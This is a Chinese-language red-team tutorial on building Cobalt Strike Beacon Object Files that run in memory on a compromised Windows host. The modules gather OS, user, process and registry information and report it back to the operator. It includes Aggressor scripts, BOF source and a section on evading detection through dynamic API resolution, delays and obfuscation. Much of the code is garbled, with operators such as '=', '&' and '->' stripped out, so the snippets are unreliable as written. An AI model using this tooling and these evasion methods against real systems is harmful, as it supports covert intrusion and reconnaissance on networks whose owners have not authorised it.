CobaltStrike BOF开发实战构建高效内存传参的信息收集工具在红队行动和内网渗透测试中无文件化执行已成为规避检测的关键策略。CobaltStrike的Beacon Object FileBOF技术允许我们直接在内存中加载和执行自定义功能模块无需在目标磁盘留下任何痕迹。本文将深入探讨如何开发一个能够接收复杂参数、执行特定信息收集任务并格式化输出的BOF工具解决实际渗透中常见的参数传递难题。1. BOF开发环境与核心机制解析1.1 现代化BOF开发环境搭建推荐使用集成了最新Windows API封装的开发模板大幅降低开发复杂度# 克隆优化后的BOF开发模板 git clone https://github.com/evilashz/Visual-Studio-BOF-template该模板具有以下优势模块化头文件组织按DLL分类的API定义如kernel32.h、advapi32.h完整的API前缀处理自动添加KERNEL32$等前缀调试支持包含本地测试用的main函数实现关键文件说明文件用途重要性beacon.hBeacon交互API定义★★★★★bofdefs.hWindows API宏定义★★★★☆debug.h调试输出工具★★★☆☆1.2 BOF执行模型深度剖析BOF运行在特殊的受限环境中无标准库支持不能直接使用printf等传统C函数受限API调用必须通过Beacon提供的封装函数独立内存空间每个BOF运行在隔离的堆栈中典型执行流程Beacon将BOF.obj文件加载到内存解析导出符号并验证兼容性初始化临时执行环境调用go入口函数清理执行现场内存管理要点// 错误做法大数组导致堆栈溢出 WCHAR output[4096]; // 正确做法使用堆内存 WCHAR *output (WCHAR *)HeapAlloc( GetProcessHeap(), HEAP_ZERO_MEMORY, 4096 * sizeof(WCHAR) );2. 高级参数传递技术实战2.1 传统参数传递的局限性原始inline-execute命令存在以下问题无法直接传递字符串参数缺乏结构化数据支持参数长度受限2.2 使用bof_pack实现复杂参数传递通过Aggressor Script的打包函数实现灵活传参// CNA脚本示例 sub custom_bof { $bof info_collect.obj; $args bof_pack( zz, // 格式字符串 admin, // 第一个字符串参数 Pssw0rd123 // 第二个字符串参数 ); beacon_inline_execute($1, $bof, go, $args); }格式字符串说明符号数据类型字节大小bbyte1z字符串变长iint324wint6482.3 内存中的参数解析技术在BOF中正确解析打包参数void go(char* buff, int len) { datap parser; char *arg1, *arg2; // 初始化解析器 BeaconDataParse(parser, buff, len); // 提取参数 arg1 BeaconDataExtract(parser, NULL); arg2 BeaconDataExtract(parser, NULL); // 使用参数执行操作 BeaconPrintf(CALLBACK_OUTPUT, User: %s, arg1); BeaconPrintf(CALLBACK_OUTPUT, Hash: %s, arg2); }参数解析常见问题排查检查格式字符串与参数类型匹配验证缓冲区长度与实际数据一致确保使用正确的字节序3. 实战内存驻留型信息收集工具开发3.1 设计架构与功能规划典型信息收集BOF应包含目标系统信息采集OS版本、补丁等网络配置枚举接口、路由、ARP表进程与服务分析带签名的运行中进程用户与权限检查特权组、登录会话数据结构设计示例typedef struct _TARGET_INFO { DWORD pid; WCHAR username[64]; WCHAR hostname[MAX_COMPUTERNAME_LENGTH 1]; DWORD is_admin; } TARGET_INFO;3.2 关键API的安全调用方法通过BOF安全调用Windows API// 获取系统版本信息示例 void get_os_info() { OSVERSIONINFOEX osInfo {0}; osInfo.dwOSVersionInfoSize sizeof(OSVERSIONINFOEX); if(KERNEL32$GetVersionEx((OSVERSIONINFO*)osInfo)) { BeaconPrintf(CALLBACK_OUTPUT, OS Version: %d.%d Build %d, osInfo.dwMajorVersion, osInfo.dwMinorVersion, osInfo.dwBuildNumber ); } }API调用最佳实践总是检查API返回值使用安全的缓冲区大小及时释放分配的资源最小化API调用痕迹3.3 输出格式化与结果返回高级结果格式化技术void format_output(TARGET_INFO *info) { formatp formatter; char *output; BeaconFormatAlloc(formatter, 1024); BeaconFormatAppend(formatter, Scan Result:\n PID: %d\n User: %s\n Host: %s\n Admin: %s, info-pid, info-username, info-hostname, info-is_admin ? Yes : No ); output BeaconFormatToString(formatter); BeaconPrintf(CALLBACK_OUTPUT, output); BeaconFormatFree(formatter); }输出优化技巧使用BeaconFormat系列函数构建复杂输出对敏感信息进行模糊处理支持多种输出格式CSV、JSON等4. 高级技巧与实战优化4.1 内存操作性能优化对比不同内存分配策略方法优点缺点适用场景局部变量速度快大小受限小数据块HeapAlloc灵活可控需手动管理大数据块Beacon API集成度高功能有限中间数据性能敏感代码示例// 高效内存拷贝实现 void fast_memcpy(void *dst, const void *src, size_t len) { __movsb(dst, src, len); }4.2 错误处理与稳定性增强健壮的错误处理框架#define CHECK_API(api, msg) \ if(!api) { \ BeaconPrintf(CALLBACK_ERROR, \ API %s not found: %s, #api, msg); \ return FALSE; \ } BOOL safe_operation() { CHECK_API(KERNEL32$GetSystemInfo, Critical API); // 实际操作代码 return TRUE; }4.3 对抗检测技术集成常见规避检测技术实现// API调用混淆示例 typedef NTSTATUS (NTAPI* pNtQuerySystemInformation)( ULONG SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength ); void stealthy_query() { pNtQuerySystemInformation NtQuerySystemInformation (pNtQuerySystemInformation)BeaconGetFunctionAddress( ntdll.dll, NtQuerySystemInformation); // 使用函数指针调用 if(NtQuerySystemInformation) { /* ... */ } }规避检测策略动态解析API地址使用非常用API替代常见功能引入随机延迟混淆字符串和算法5. 实战案例注册表键值扫描器完整实现一个可接收参数的注册表扫描BOFvoid go(char *args, int len) { datap parser; WCHAR *regPath, *valueName; HKEY hKey NULL; DWORD type, size; BYTE *data NULL; // 解析参数 BeaconDataParse(parser, args, len); regPath (WCHAR*)BeaconDataExtract(parser, NULL); valueName (WCHAR*)BeaconDataExtract(parser, NULL); // 打开注册表键 if(ADVAPI32$RegOpenKeyExW( HKEY_LOCAL_MACHINE, regPath, 0, KEY_READ, hKey) ERROR_SUCCESS) { // 查询值大小 ADVAPI32$RegQueryValueExW( hKey, valueName, NULL, type, NULL, size); // 分配缓冲区并读取值 data HeapAlloc(GetProcessHeap(), 0, size); if(ADVAPI32$RegQueryValueExW( hKey, valueName, NULL, type, data, size) ERROR_SUCCESS) { // 格式化输出结果 format_output_registry(type, data, size); } HeapFree(GetProcessHeap(), 0, data); ADVAPI32$RegCloseKey(hKey); } }配套的CNA调用脚本alias regscan { $bof regscan.obj; $path SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion; $value ProductName; $args bof_pack(zz, $path, $value); foreach $bid ($1) { beacon_inline_execute($bid, $bof, go, $args); } }在开发这类工具时我发现最常遇到的问题是大内存分配导致的稳定性问题。通过将大块操作分解为多个小请求并加入适当的错误恢复机制可以显著提高BOF在复杂环境下的可靠性。另一个实用技巧是使用BeaconAddValue和BeaconGetValue函数在多次BOF调用间保持状态这对于需要分阶段执行的复杂信息收集任务特别有用。